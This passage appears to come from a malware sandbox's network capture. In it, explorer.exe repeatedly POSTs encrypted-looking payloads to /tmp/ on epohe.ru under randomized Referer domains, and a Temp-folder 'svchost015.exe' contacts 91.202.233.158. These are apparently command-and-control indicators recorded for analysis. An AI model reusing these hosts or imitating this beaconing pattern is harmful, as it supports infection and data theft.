Sep 1, 2024 18:27:54.110539913 CEST	254	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 33 34 b1 e4 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu34~tfiPPs5P"0]i @'Wb(0WB9l,s:Kd2<d?u"H,r\|\|}o8N)\!yL>u
Sep 1, 2024 18:27:55.376424074 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	56168	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:55.392174959 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bvfaiaplegbqsb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: epohe.ru
Sep 1, 2024 18:27:55.392190933 CEST	267	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 43 25 a7 9a Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuC%w>cZdz8_,z%.uU9U?#a0/P\|.2BJi]3T!0b* \$lXOat\|e{4&n
Sep 1, 2024 18:27:56.666378021 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	56170	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:56.714131117 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eqstqyhldwdanxk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: epohe.ru
Sep 1, 2024 18:27:56.714149952 CEST	118	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 73 3c a2 f6 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vus<q,\|FG4=iK/[\[
Sep 1, 2024 18:27:57.953836918 CEST	219	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ\|~B9=#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	56172	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:28:01.836956978 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ntuywdodepqxw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: epohe.ru
Sep 1, 2024 18:28:01.836977959 CEST	227	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 26 2a ae 95 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA ,[k,vu&*_$\|^JQjFDkm+O}=WI59VU7$tM-{b1bWPk{T(7<~O6'TN!R
Sep 1, 2024 18:28:03.101408958 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	56173	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:28:03.143724918 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gjyoldehyuuov.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 191 Host: epohe.ru
Sep 1, 2024 18:28:03.143760920 CEST	191	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 67 23 d9 81 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vug#KDN6OO1s\zFyiG,KSH1iy{ zdJ%\g
Sep 1, 2024 18:28:04.414330959 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	56174	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:28:04.435401917 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pasvtjgoedtsb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: epohe.ru
Sep 1, 2024 18:28:04.435436010 CEST	279	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 62 54 c0 9a Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vubT}Zq1g)xkt?tPG~e+tVHwWf'<uE`.h?SwA][*%I~V(JgVy
Sep 1, 2024 18:28:05.692744970 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	56175	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:28:05.735392094 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rhvpemocona.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 125 Host: epohe.ru
Sep 1, 2024 18:28:05.735403061 CEST	125	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 38 00 bc 8e Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu8]v]Lq^u.NznAyY>3
Sep 1, 2024 18:28:07.729626894 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Sep 1, 2024 18:28:07.730884075 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Sep 1, 2024 18:28:07.731158972 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	56176	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:28:07.778712034 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jskidlnulxlha.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: epohe.ru
Sep 1, 2024 18:28:07.778728008 CEST	314	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 48 4f fe e4 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuHO^td5Je~3<c'hlKU%&}KE"v5"cdb:`^8`[jIKJ/,l8VM?Leih@b
Sep 1, 2024 18:28:09.062797070 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:28:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	56177	91.202.233.158	80	708	C:\Users\user\AppData\Local\Temp\svchost015.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:28:10.609755039 CEST	89	OUT	GET / HTTP/1.1 Host: 91.202.233.158 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 18:28:11.305438042 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
